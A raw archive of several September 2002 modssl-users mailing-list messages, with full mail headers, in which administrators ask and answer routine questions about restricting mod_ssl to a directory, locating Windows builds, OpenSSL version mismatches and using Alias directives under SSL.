Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Cance 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--B_3115382554_1074010
Content-type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable

I=B9m trying to configure my server to use SSL just for requests to a specifi=
c
directory.

I=B9ve read the manuals, installed mod_ssl + certificate and all seemed to be
working fine,=20

HTTP access to the server at large goes ahead and http accesses to the
=8Csecured=B9 directory are refused as desired.

However when a file know to be stored within the secured directory is
requested a page not found error is displayed and the following written to
ssl_engine_log, (ssl_request_log remains empty);

[20/Sep/2002 15:33:26 68075] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[20/Sep/2002 15:33:26 68075] [error] System: Broken pipe (errno: 32)

I=B9m using the following lines in my httpd.conf to try and achieve the
desired affect;

SSLVerifyClient none

        SSLRequireSSL
        SSLVerifyClient require
        SSLVerifyDepth 1


When I put the above lines in the ssl virtual host directive nothing appear=
s
to happen, http accesses to the directory are granted, though when I move i=
t
to  http accesses to the directory are refused as
desired, which confuses me.

Can anyone help as I=B9m real stuck with this one.
=20
BTW- as yet the CommonName used by my certificate is not applied to my
server, I=B9m accessing the machine via its IP and acknowledging the warning
dialogue my browser displays=8A I=B9m assuming this is not the cause of my
trouble?

--B_3115382554_1074010
Content-type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: quoted-printable



http + https


I’m trying to configure my server to use SSL just =
for requests to a specific directory.



I’ve read the manuals, installed mod_ssl + certificate and all seemed=
 to be working fine, 



HTTP access to the server at large goes ahead and http accesses to the R=
16;secured’ directory are refused as desired.



However when a file know to be stored within the secured directory is reque=
sted a page not found error is displayed and the following written to ssl_en=
gine_log, (ssl_request_log remains empty);



[20/Sep/2002 15:33:26 68075] [error] SSL handshake interrupted by system [H=
int: Stop button pressed in browser?!] (System error follows)

[20/Sep/2002 15:33:26 68075] [error] System: Broken pipe (errno: 32)



I’m using the following lines in my httpd.conf to try and achieve the=
 desired affect;



SSLVerifyClient none

<Directory /usr/local/apache/htdocs/secure>

        SSLRequireSSL

        SSLVerifyClient require

        SSLVerifyDepth 1

</Directory>



When I put the above lines in the ssl virtual host directive nothing appear=
s to happen, http accesses to the directory are granted, though when I move =
it to <IfModule mod_ssl.c> http accesses to the directory are refused =
as desired, which confuses me.



Can anyone help as I’m real stuck with this one.

 

BTW- as yet the CommonName used by my certificate is not applied to my serv=
er, I’m accessing the machine via its IP and acknowledging the warning=
 dialogue my browser displays… I’m assuming this is not the caus=
e of my trouble?




--B_3115382554_1074010--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 18:47:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28095; Fri, 20 Sep 2002 18:46:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pladesigns.com id SAA28087; Fri, 20 Sep 2002 18:45:15 +0200 (MET DST)
Received: from brownie.pladesigns.com [63.105.23.196] by pladesigns.com [63.105.23.196]
	with SMTP (MDaemon.v3.5.7.R)
	for ; Fri, 20 Sep 2002 09:43:03 -0700
Received: FROM cairo.pladesigns.com BY brownie.pladesigns.com ; Fri Sep 20 09:42:58 2002 -0700
Received: by CAIRO with Internet Mail Service (5.5.2653.19)
	id ; Fri, 20 Sep 2002 09:20:42 -0700
Message-ID: <91FBD0B430EFD5118B930060672D982C0BD0DC@CAIRO>
From: David Buerer 
To: "'modssl-users@modssl.org'" 
Subject: Windows Builds?
Date: Fri, 20 Sep 2002 09:20:41 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C260C1.A9FD7570"
X-MDRemoteIP: 63.105.23.196
X-Return-Path: david@pladesigns.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Buerer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C260C1.A9FD7570
Content-Type: text/plain;
	charset="iso-8859-1"

I feel like an idiot this morning...but not more than six months ago I
installed apache+openssl+modssl on an NT machine and I downloaded the binary
build from somewhere.  For the life of me thought, I can not find the site!
Anyone have any ideas?  I am trying to find an updated version with a more
current version of apache, bug fixes, and the like.
 
Thanks,
David
 

------_=_NextPart_001_01C260C1.A9FD7570
Content-Type: text/html;
	charset="iso-8859-1"









I feel like an idiot 
this morning...but not more than six months ago I installed 
apache+openssl+modssl on an NT machine and I downloaded the binary build from 
somewhere.  For the life of me thought, I can not find the site! Anyone 
have any ideas?  I am trying to find an updated version with a more current 
version of apache, bug fixes, and the like.


 


Thanks,


David


 


------_=_NextPart_001_01C260C1.A9FD7570--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 18:54:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28413; Fri, 20 Sep 2002 18:53:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from netplex.aperion.com id SAA28404; Fri, 20 Sep 2002 18:52:27 +0200 (MET DST)
Received: (qmail 41472 invoked by alias); 20 Sep 2002 16:42:39 -0000
Received: from adsl-64-109-152-150.dsl.sfldmi.ameritech.net (HELO cblanzy) (64.109.152.150)
  by 0 with SMTP; 20 Sep 2002 16:42:39 -0000
Message-ID: <00ca01c260c6$16313570$4500000a@cblanzy>
From: "Craig Blanzy" 
To: 
References: <91FBD0B430EFD5118B930060672D982C0BD0DC@CAIRO>
Subject: Re: Windows Builds?
Date: Fri, 20 Sep 2002 12:52:20 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00C7_01C260A4.8EEB8D20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Craig Blanzy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00C7_01C260A4.8EEB8D20
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Are you looking for the apache site?  apache.org is the place to start?  =
they have links to any other apache related projects from there.

  ----- Original Message -----=20
  From: David Buerer=20
  To: 'modssl-users@modssl.org'=20
  Sent: Friday, September 20, 2002 12:20 PM
  Subject: Windows Builds?


  I feel like an idiot this morning...but not more than six months ago I =
installed apache+openssl+modssl on an NT machine and I downloaded the =
binary build from somewhere.  For the life of me thought, I can not find =
the site! Anyone have any ideas?  I am trying to find an updated version =
with a more current version of apache, bug fixes, and the like.

  Thanks,
  David


------=_NextPart_000_00C7_01C260A4.8EEB8D20
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Are you looking for the apache =
site? =20
apache.org is the place to start?  they have links to any other =
apache=20
related projects from there.


 



  
----- Original Message ----- 

  From:=20
  David=20
  Buerer 
  
  
Sent: Friday, September 20, =
2002 12:20=20
  PM

  
Subject: Windows Builds?

  


  
I =
feel like an=20
  idiot this morning...but not more than six months ago I installed=20
  apache+openssl+modssl on an NT machine and I downloaded the binary =
build from=20
  somewhere.  For the life of me thought, I can not find the site! =
Anyone=20
  have any ideas?  I am trying to find an updated version with a =
more=20
  current version of apache, bug fixes, and the =
like.

  
 

  
Thanks,

  
David

  
 


------=_NextPart_000_00C7_01C260A4.8EEB8D20--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 20:23:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA00575; Fri, 20 Sep 2002 20:22:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id UAA00567; Fri, 20 Sep 2002 20:21:22 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 3F43F2BAF1; Fri, 20 Sep 2002 11:13:02 -0700 (PDT)
Date: Fri, 20 Sep 2002 11:13:02 -0700
From: daniel 
To: modssl-users@modssl.org
Subject: Re: Windows Builds?
Message-ID: <20020920181302.GA4795@rawbyte.com>
References: <91FBD0B430EFD5118B930060672D982C0BD0DC@CAIRO>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <91FBD0B430EFD5118B930060672D982C0BD0DC@CAIRO>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: daniel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Sep 20, 2002 at 09:20:41AM -0700, David Buerer wrote:
> I feel like an idiot this morning...but not more than six months ago I
> installed apache+openssl+modssl on an NT machine and I downloaded the binary
> build from somewhere.  For the life of me thought, I can not find the site!
> Anyone have any ideas?  I am trying to find an updated version with a more
> current version of apache, bug fixes, and the like.

You can find binaries at
http://www.modssl.org/contrib/ftp/contrib/
(not updated to the very latest ones)

If you use 2.0.40 binary from ASF (http.apache.org) you can get modssl
unofficial binary from http://www.madhon.co.uk/modssl/

Cheers

Daniel


--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 20:43:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA00866; Fri, 20 Sep 2002 20:42:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id UAA00857; Fri, 20 Sep 2002 20:41:09 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMQHIHBH3K00MK31@mdx.ac.uk> for modssl-users@modssl.org; Fri,
 20 Sep 2002 19:41:12 +0100 (BST)
Received: from mdx-nwsup1.nw.mdx.ac.uk (mdx-nwsup1.mdx.ac.uk [158.94.57.9])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KMQHI58NGE00L0AK@mdx.ac.uk>
 for modssl-users@modssl.org; Fri, 20 Sep 2002 19:41:09 +0100 (BST)
Received: from MDX-NWSUP1/SpoolDir by mdx-nwsup1.nw.mdx.ac.uk (Mercury 1.48)
 ; Fri, 20 Sep 2002 19:38:18 +0000
Received: from SpoolDir by MDX-NWSUP1 (Mercury 1.48); Fri,
 20 Sep 2002 19:36:26 +0000
Date: Fri, 20 Sep 2002 19:35:36 +0000
From: a.moon@mdx.ac.uk
Subject: Re: Windows Builds?
To: modssl-users@modssl.org
Message-id: <1B14BC34A33@mdx-nwsup1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 21:57:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA02178; Fri, 20 Sep 2002 21:56:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp010.tiscali.dk id VAA02160; Fri, 20 Sep 2002 21:55:14 +0200 (MET DST)
Received: from nyberg.name (213.237.25.111.adsl.oebr.worldonline.dk [213.237.25.111])
	by smtp010.tiscali.dk (8.12.5/8.12.5) with ESMTP id g8KJt8nV023983
	for ; Fri, 20 Sep 2002 21:55:09 +0200 (MEST)
Message-ID: <3D8B7D17.1020809@nyberg.name>
Date: Fri, 20 Sep 2002 21:55:03 +0200
From: Martin Nyberg 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.1) Gecko/20020826
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users 
Subject: Version number
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Nyberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi !

I've just upgraded OpenSSL 0.9.6d to 0.9.6g on FreeBSD, but Apache says 
that it's running OpenSSL 0.9.6a!

Where is this version number and how to change it?

I read somewhere in the archive that a solution might be to recompile 
PHP... But what does PHP have to do with Apache (something I don't know) ?


Thanks.

Martin Nyberg

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 22:56:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA03307; Fri, 20 Sep 2002 22:55:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vulcan.bascom.com id WAA03303; Fri, 20 Sep 2002 22:54:46 +0200 (MET DST)
Received: (from root@localhost)
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) id g8KKsiK18873
	for modssl-users@modssl.org; Fri, 20 Sep 2002 16:54:44 -0400
Received: from dcomont (sandstorm-red.bascom.com [206.112.62.241])
	by vulcan.bascom.com (8.11.3/8.11.3/SuSE Linux 8.11.1-0.5) with SMTP id g8KKsfl18820
	for ; Fri, 20 Sep 2002 16:54:41 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Version number
Date: Fri, 20 Sep 2002 16:55:05 -0400
Message-ID: <000201c260e7$ffa99190$13013c0a@dcomo>
MIME-Version: 1.0
X-scanner: scanned by Inflex 1.0.12.2 - (http://pldaniels.com/inflex/)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3D8B7D17.1020809@nyberg.name>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Martin,

Actually, you may need to recompile Apache (w/ PHP if you need that.)
When building Apache from sources, you have to specify where the OpenSSL
libraries are installed.  If you happened to not use the ones specified
by the RPM and used OpenSSL sources, upgrading the RPM will not help you
and you will need to rebuild Apache with the new libraries.

Let me know if you need help with this...

============================================
Drew J. Como             Phone: 631-434-6600
Systems Administrator      Fax: 631-434-7800
dcomo@bascom.com         Web: www.bascom.com
    Bascom Global Internet Services, Inc.
--------------------------------------------
          "When quality is the goal, 
           winning is guaranteed." 

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Martin Nyberg
Sent: Friday, September 20, 2002 3:55 PM
To: modssl-users
Subject: Version number


Hi !

I've just upgraded OpenSSL 0.9.6d to 0.9.6g on FreeBSD, but Apache says 
that it's running OpenSSL 0.9.6a!

Where is this version number and how to change it?

I read somewhere in the archive that a solution might be to recompile 
PHP... But what does PHP have to do with Apache (something I don't know) ?


Thanks.

Martin Nyberg

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 23:00:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA03417; Fri, 20 Sep 2002 22:59:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from jive.SoftHome.net id WAA03412; Fri, 20 Sep 2002 22:59:02 +0200 (MET DST)
From: richard.mail@softhome.net
Received: (qmail 8789 invoked by uid 417); 20 Sep 2002 20:52:21 -0000
Received: from slide-.softhome.net (HELO softhome.net) (172.16.2.21)
  by shunt-smtp-out-0 with SMTP; 20 Sep 2002 20:52:21 -0000
Received: from localhost (localhost [127.0.0.1])
  (uid 417)
  by softhome.net with local; Fri, 20 Sep 2002 14:52:21 -0600
References: <3D8B7D17.1020809@nyberg.name>
In-Reply-To: <3D8B7D17.1020809@nyberg.name> 
To: modssl-users@modssl.org
Subject: Re: Version number
Date: Fri, 20 Sep 2002 14:52:20 -0600
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Sender: richard.mail@softhome.net
X-Originating-IP: [212.64.49.56]
Message-ID: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: richard.mail@softhome.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Martin Nyberg writes: 

> Hi ! 
> 
> I've just upgraded OpenSSL 0.9.6d to 0.9.6g on FreeBSD, but Apache says 
> that it's running OpenSSL 0.9.6a! 
> 
> Where is this version number and how to change it? 
> 
> I read somewhere in the archive that a solution might be to recompile 
> PHP... But what does PHP have to do with Apache (something I don't know) ? 
> 
> 
> Thanks. 
> 
> Martin Nyberg 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
 

 

hi, 

to get it right, you should recomplie apache and php to show the correct 
version numbers. 

i've had the same problem and that's how i fixed it. 

i hope it helps for you 

greetz 

Richard
The Netherlands
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 23:36:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA04572; Fri, 20 Sep 2002 23:35:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from julesburg.uits.indiana.edu id XAA04564; Fri, 20 Sep 2002 23:35:00 +0200 (MET DST)
Received: from iu-mssg-smtp04.ads.iu.edu (iu-mssg-smtp04.exchange.iu.edu [129.79.1.223])
	by julesburg.uits.indiana.edu (8.12.1/8.12.1/IUPO) with ESMTP id g8KLYTej013098
	for ; Fri, 20 Sep 2002 16:34:55 -0500 (EST)
Received: from iu-mssg-mbx06.ads.iu.edu ([129.79.1.215]) by iu-mssg-smtp04.ads.iu.edu with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 20 Sep 2002 16:34:28 -0500
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: Attempt to free unreferenced scalar during global destruction
Date: Fri, 20 Sep 2002 16:31:17 -0500
Message-ID: <84A322754D9E0B489A29DA0F296354B902AC6F@iu-mssg-mbx06.exchange.iu.edu>
Thread-Topic: Attempt to free unreferenced scalar during global destruction
Thread-Index: AcJg7Q2ArY0KAZhpQ42sMwez6JXXVg==
From: "Kellam, Jeannie K Priest" 
To: 
X-OriginalArrivalTime: 20 Sep 2002 21:34:28.0513 (UTC) FILETIME=[7FA99110:01C260ED]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id XAA04566
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kellam, Jeannie K Priest" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

The following message occurred about 11 times in the ssl error log in a space of about 40 minutes, during which time no other activity was reported in the logs.  

"Attempt to free unreferenced scalar during global destruction"

The apache_1.3.26/mod_ssl-2.8.10-1.3.26/openssl-0.9.6g server had to be restarted to fix the problem.  It's running on a Sun 420R with Solaris 8.  Any ideas what would cause this?

Thanks

Jeannie
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 23:43:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA04702; Fri, 20 Sep 2002 23:42:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.storagecommander.com id XAA04693; Fri, 20 Sep 2002 23:41:35 +0200 (MET DST)
Received: from rtfm (host_254 [192.168.0.254])
	by mail.storagecommander.com (8.11.6/8.11.2) with SMTP id g8KLi5k31291;
	Fri, 20 Sep 2002 14:44:05 -0700
Message-ID: <01f501c260ee$a42953d0$6900a8c0@rtfm>
From: "Matias Silva" 
To: , 
References: <9B66BBD37D5DD411B8CE00508B69700F033F20BD@pborolocal.rnib.org.uk>
Subject: Re: Using Aliases and SSL
Date: Fri, 20 Sep 2002 14:42:38 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01F2_01C260B3.F78BEC30"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Matias Silva" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01F2_01C260B3.F78BEC30
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Thanks John for your reply..... Yes I want to alias directories.  =
Basically I have a directory structure n deep and I have to reference =
common directories, but I don't want to do this relatively (e.g =
../.../../TargetDirectory).  I want to use absolute
directories using the Alias command/directive (e.g /TargetDirectory) =
under the SSL environment.

Below is a partial copy from my ssl.conf file minusing the comments and =
all the ssl stuff.  I picked up
an Apache 2.0 book today so .... I'm going to keep trying.  Any =
suggestions would be appreciated.

Cheers
Matt=20





#  General setup for the virtual host
DocumentRoot "/NetCommander/MainStreetStorageCorp/nc"
ServerName new.host.name:443
ServerAdmin you@your.address
ErrorLog logs/error_log
TransferLog logs/access_log

Alias /images/ "/NetCommander/MainStreetStorageCorp/nc/images/"


   Options Indexes MultiViews
   AllowOverride None
   Order allow,deny
   Allow from all


Alias /include/ "NetCommander/MainStreetStorageCorp/nc/include/"


   Options Indexes Multiviews
   AllowOverride None
   Order allow,deny
   Allow from all


Alias /styles/ "NetCommander/MainStreetStorageCorp/nc/styles/"


   Options Indexes Multiviews
   AllowOverride None
   Order allow,deny
   Allow from all


Alias /javascript/ "/NetCommander/MainStreetStorageCorp/nc/javascript/"


   Options Indexes Multiviews
   AllowOverride None
   Order allow,deny
   Allow from all


         :
         :
         :
SSL Directives
         :
         :
         :



    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


        :
        :
        :
More SSL Directives
        :
        :
        :

                                 =20






  ----- Original Message -----=20
  From: John.Airey@rnib.org.uk=20
  To: modssl-users@modssl.org=20
  Sent: Thursday, September 19, 2002 1:19 AM
  Subject: RE: Using Aliases and SSL


  Do I take it that you mean "ServerAlias"? If you do, then provided the =
alias name matches the same IP address that your secure host is =
listening to, it should work. I use it here myself.

  If on the other hand you mean the Alias command that aliases =
directories, I know of no reason why this shouldn't work. Can you post =
an example please?

  -=20
  John Airey, BSc (Jt Hons), CNA, RHCE=20
  Internet systems support officer, ITCSD, Royal National Institute of =
the Blind,=20
  Bakewell Road, Peterborough PE2 6XU,=20
  Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 =
John.Airey@rnib.org.uk=20

  Reality TV - the ultimate oxymoron=20

    -----Original Message-----
    From: Matias Silva [mailto:mpsilva@storagecommander.com]
    Sent: 18 September 2002 20:39
    To: User Group mod_ssl
    Subject: Using Aliases and SSL


    Can anybody assist me, in using Aliases with ssl?. =20

    I placed several Alias directives within the ssl.conf file =
specifically where the virtual host is defined. =20
    This was to help assist in organizing the Apache server.  Of course =
its not working.

    Where should I place Alias Directives that need to be included in =
the ssl area of the server ?
    or Does SSL even work with Aliases?

    Cheers
    -Matt


  -=20



  NOTICE: The information contained in this email and any attachments is =


  confidential and may be legally privileged. If you are not the=20

  intended recipient you are hereby notified that you must not use,=20

  disclose, distribute, copy, print or rely on this email's content. If=20

  you are not the intended recipient, please notify the sender=20

  immediately and then delete the email and any attachments from your=20

  system.



  RNIB has made strenuous efforts to ensure that emails and any=20

  attachments generated by its staff are free from viruses. However, it=20

  cannot accept any responsibility for any viruses which are=20

  transmitted. We therefore recommend you scan all attachments.



  Please note that the statements and views expressed in this email=20

  and any attachments are those of the author and do not necessarily=20

  represent those of RNIB.



  RNIB Registered Charity Number: 226227



  Website: http://www.rnib.org.uk=20


------=_NextPart_000_01F2_01C260B3.F78BEC30
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Thanks John for your reply..... =
Yes I want to=20
alias directories.  Basically I have a directory structure n deep =
and I=20
have to reference common directories, =
but I don't=20
want to do this relatively (e.g ../.../../TargetDirectory).  I want =
to use=20
absolute


directories using the Alias =
command/directive (e.g=20
/TargetDirectory) under the SSL environment.


 


Below is a partial copy from my =
ssl.conf file=20
minusing the comments and all the ssl stuff.  I picked =
up


an Apache 2.0 book today so .... =
I'm going to=20
keep trying.  Any suggestions would be =
appreciated.


 


Cheers


Matt 


 


 


 


<VirtualHost =
_default_:443>


 


#  General setup for the virtual=20
host
DocumentRoot =
"/NetCommander/MainStreetStorageCorp/nc"
ServerName=20
new.host.name:443
ServerAdmin you@your.address
ErrorLog=20
logs/error_log
TransferLog logs/access_log




 


Alias /images/=20
"/NetCommander/MainStreetStorageCorp/nc/images/"


 


<Directory=20
"/NetCommander/MainStreetStorageCorp/nc/images/">
   =
Options=20
Indexes MultiViews
   AllowOverride None
   =
Order=20
allow,deny
   Allow from =
all
</Directory>


 


Alias /include/=20
"NetCommander/MainStreetStorageCorp/nc/include/"


 


<Directory=20
"/NetCommander/MainStreetStorageCorp/nc/include/">
   =
Options=20
Indexes Multiviews
   AllowOverride None
   =
Order=20
allow,deny
   Allow from =
all
</Directory>


 


Alias /styles/=20
"NetCommander/MainStreetStorageCorp/nc/styles/"


 


<Directory=20
"/NetCommander/MainStreetStorageCorp/nc/styles/">
   =
Options=20
Indexes Multiviews
   AllowOverride None
   =
Order=20
allow,deny
   Allow from =
all
</Directory>


 


Alias /javascript/=20
"/NetCommander/MainStreetStorageCorp/nc/javascript/"


 


<Directory=20
"/NetCommander/MainStreetStorageCorp/nc/javascript/">
   =
Options=20
Indexes Multiviews
   AllowOverride None
   =
Order=20
allow,deny
   Allow from =
all
</Directory>


 


        =20
:


        =20
:


        =20
:


SSL Directives
         =
:


         :


         :


 



<Files ~ =
"\.(cgi|shtml|phtml|php3?)$">
   =20
SSLOptions +StdEnvVars
</Files>
<Directory=20
"/usr/local/apache2/cgi-bin">
    SSLOptions=20
+StdEnvVars
</Directory>


 


        :


        :


        :


More SSL Directives


        :


        :


        :


 


</VirtualHost>        =
            &=
nbsp;           &n=
bsp;=20



 


</IfDefine>


 


 






  
----- Original Message ----- 

  From:=20
  John.Airey@rnib.org.uk =

  
  
Sent: Thursday, September 19, =
2002 1:19=20
  AM

  
Subject: RE: Using Aliases and =
SSL

  


  
Do I=20
  take it that you mean "ServerAlias"? If you do, then provided the =
alias name=20
  matches the same IP address that your secure host is listening to, it =
should=20
  work. I use it here myself.

  
 

  
If=20
  on the other hand you mean the Alias command that aliases directories, =
I know=20
  of no reason why this shouldn't work. Can you post an example=20
  please?

  
 

  

  
- 
John Airey,=20
  BSc (Jt Hons), CNA, RHCE 
Internet systems=20
  support officer, ITCSD, Royal National Institute of the Blind,=20
  
Bakewell Road, Peterborough PE2 =
6XU,=20
  
Tel.: +44 (0) 1733 375299 Fax: +44 =
(0) 1733=20
